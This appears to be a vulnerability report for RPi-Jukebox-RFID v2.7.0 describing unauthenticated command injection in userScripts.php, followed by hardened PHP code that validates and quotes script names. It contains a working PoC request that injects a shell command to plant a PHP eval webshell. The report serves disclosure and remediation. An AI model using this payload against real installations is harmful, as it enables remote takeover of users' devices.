I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report an RCE vulnerability in RPi-Jukebox-RFID-v2.7 (no permissions required).
Analysis
The path of the vulnerability: htdocs\userScripts.php
Source from Line 46 ($_POST['filename']). And then there is a check point (Line 62), which we should set $_POST['ACTION'] = userScript to bypass. After bypassing the check point, the source (tainted) passes to $exec and exec($exec); (Line 68) without another check.
PoC
POST /htdocs/userScripts.php
Data:
ACTION=userScript&folder=hello+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell4.php+%3b&folderNew=echo+%22hello%22
Here is the version without url encoding for ease of understanding:
ACTION=userScript&folder=hello ; echo "<?php @eval($_POST['pass']) ?>" > ./shell4.php ;&folderNew=echo "hello"
Manual verification
The attacker can then easily connect to this webshell (/htdocs/shell4.php)
Logs
No response
Configuration
No response
More info
No response
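A hardened form of the pattern the report describes (a POST value reaching exec() after only the ACTION check), as an added example that is not the project's userScripts.php. SCRIPT_DIR, the parameters field and both helper functions are hypothetical names chosen for illustration.

```php
<?php
// Added example: hypothetical hardened handler, not the project's userScripts.php.
// SCRIPT_DIR, the 'parameters' field and both helpers are assumptions for illustration.
declare(strict_types=1);

const SCRIPT_DIR = '/opt/jukebox/userscripts';   // assumed directory of permitted scripts

/** Return the absolute path of an allow-listed script, or null if the name is rejected. */
function resolveUserScript(string $name, string $dir = SCRIPT_DIR): ?string
{
    // Plain file names only: no path separators, shell metacharacters or whitespace,
    // and no leading '-' or '.' that could be read as an option or a hidden file.
    if (!preg_match('/\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/', $name)) {
        return null;
    }
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name);
    // realpath() resolves symlinks and "..": the result must still sit directly in $dir.
    if ($base === false || $path === false || dirname($path) !== $base) {
        return null;
    }
    return (is_file($path) && is_executable($path)) ? $path : null;
}

/** Build the command line with every dynamic part quoted as a single shell word. */
function buildCommand(string $scriptPath, string $arg): string
{
    return escapeshellarg($scriptPath) . ' ' . escapeshellarg($arg);
}

if (PHP_SAPI !== 'cli' && ($_POST['ACTION'] ?? '') === 'userScript') {
    // Request values may arrive as arrays; accept strings only.
    $name = is_string($_POST['filename'] ?? null) ? $_POST['filename'] : '';
    $arg  = is_string($_POST['parameters'] ?? null) ? $_POST['parameters'] : '';
    $script = resolveUserScript($name);
    if ($script === null) {
        http_response_code(400);
        exit('Rejected script name');
    }
    // Only a validated path and a quoted argument reach the shell.
    exec(buildCommand($script, $arg), $output, $status);
}
```

Validation and quoting close the injection path only; the report also states that no permissions are required, so the endpoint needs an authentication check in front of it as well.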